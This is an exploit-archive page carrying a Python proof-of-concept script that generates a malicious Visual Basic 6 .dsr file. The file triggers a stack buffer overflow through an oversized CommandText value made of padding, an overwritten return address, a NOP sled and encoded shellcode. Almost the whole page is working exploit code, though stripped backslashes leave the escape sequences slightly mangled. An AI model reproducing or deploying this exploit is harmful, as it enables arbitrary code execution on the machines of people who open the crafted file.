[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : MS Visual Basic Enterprise Ed. 6 SP6 DSR File Local BOF Exploit
# Published : 2008-04-04
# Author : shinnai
# Previous Title : SCO UnixWare Merge mcd Local Root Exploit
# Next Title : XnView 1.92.1 Slideshow (FontName) Buffer Overflow Exploit
#usage: exploit.py
print "-----------------------------------------------------------------------"
print ' [PoC 2] MS Visual Basic Enterprise Ed. 6 SP6 ".dsr" File Handling BoFn'
print " author: shinnai"
print " mail: shinnai[at]autistici[dot]org"
print " site: http://shinnai.altervista.orgn"
print " Once you create the file, open it with Visual Basic 6 and click on"
print " command name."
print "-----------------------------------------------------------------------"
buff = "A" * 555
get_EIP = "xFFxBEx3Fx7E" #call ESP from user32.dll
nop = "x90" * 12
shellcode = (
"xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49"
"x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36"
"x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34"
"x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41"
"x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4ax4ex46x34"
"x42x50x42x30x42x50x4bx38x45x44x4ex43x4bx38x4ex47"
"x45x30x4ax47x41x30x4fx4ex4bx48x4fx54x4ax41x4bx38"
"x4fx55x42x52x41x30x4bx4ex49x54x4bx48x46x33x4bx48"
"x41x50x50x4ex41x43x42x4cx49x59x4ex4ax46x48x42x4c"
"x46x47x47x50x41x4cx4cx4cx4dx50x41x50x44x4cx4bx4e"
"x46x4fx4bx43x46x35x46x52x46x30x45x37x45x4ex4bx58"
"x4fx45x46x42x41x50x4bx4ex48x46x4bx48x4ex30x4bx44"
"x4bx48x4fx35x4ex41x41x30x4bx4ex4bx38x4ex51x4bx38"
"x41x50x4bx4ex49x38x4ex45x46x32x46x50x43x4cx41x33"
"x42x4cx46x46x4bx48x42x34x42x33x45x38x42x4cx4ax47"
"x4ex30x4bx38x42x34x4ex50x4bx58x42x47x4ex41x4dx4a"
"x4bx58x4ax36x4ax30x4bx4ex49x50x4bx48x42x48x42x4b"
"x42x30x42x50x42x30x4bx38x4ax56x4ex43x4fx55x41x33"
"x48x4fx42x46x48x35x49x38x4ax4fx43x58x42x4cx4bx37"
"x42x55x4ax36x42x4fx4cx58x46x50x4fx35x4ax36x4ax59"
"x50x4fx4cx38x50x50x47x55x4fx4fx47x4ex43x56x41x56"
"x4ex46x43x56x50x32x45x46x4ax37x45x36x42x50x5a"
)
dsrfile = (
"VERSION 5.00n"
"Begin {C0E45035-5775-11D0-B388-00A0C9055D8E} DataEnvironment1n"
" ClientHeight = 6315n"
" ClientLeft = 0n"
" ClientTop = 0n"
" ClientWidth = 7980n"
" _ExtentX = 14076n"
" _ExtentY = 11139n"
" FolderFlags = 1n"
' TypeLibGuid = "{D7133993-3B5A-4667-B63B-749EF16A1840}"n'
' TypeInfoGuid = "{050E7898-66AC-4150-A213-47C7725D7E7E}"n'
" TypeInfoCookie = 0n"
" Version = 4n"
" NumConnections = 1n"
" BeginProperty Connection1n"
' ConnectionName = "Connection1"n'
" ConnDispId = 1001n"
" SourceOfData = 3n"
' ConnectionSource= ""n'
" Expanded = -1 'Truen"
" QuoteChar = 96n"
" SeparatorChar = 46n"
" EndPropertyn"
" NumRecordsets = 1n"
" BeginProperty Recordset1n"
' CommandName = "Command1"n'
" CommDispId = 1002n"
" RsDispId = 1003n"
' CommandText = "' + buff + get_EIP + nop + shellcode + nop + '"n'
' ActiveConnectionName= "Connection1"n'
" CommandType = 2n"
" dbObjectType = 1n"
" Locktype = 3n"
" IsRSReturning = -1 'Truen"
" NumFields = 1n"
" BeginProperty Field1n"
" Precision = 10n"
" Size = 4n"
" Scale = 0n"
" Type = 3n"
' Name = "ID"n'
' Caption = "ID"n'
" EndPropertyn"
" NumGroups = 0n"
" ParamCount = 0n"
" RelationCount = 0n"
" AggregateCount = 0n"
" EndPropertyn"
"Endn"
'Attribute VB_Name = "DataEnvironment1"n'
"Attribute VB_GlobalNameSpace = Falsen"
"Attribute VB_Creatable = Truen"
"Attribute VB_PredeclaredId = Truen"
"Attribute VB_Exposed = Falsen"
)
try:
out_file = open("DataEnvironment1.dsr",'w')
out_file.write(dsrfile)
out_file.close()
print "nFILE CREATION COMPLETED!n"
except:
print " n -------------------------------------"
print " Usage: exploit.py"
print " -------------------------------------"
print "nAN ERROR OCCURS DURING FILE CREATION!"
# www.Syue.com [2008-04-04]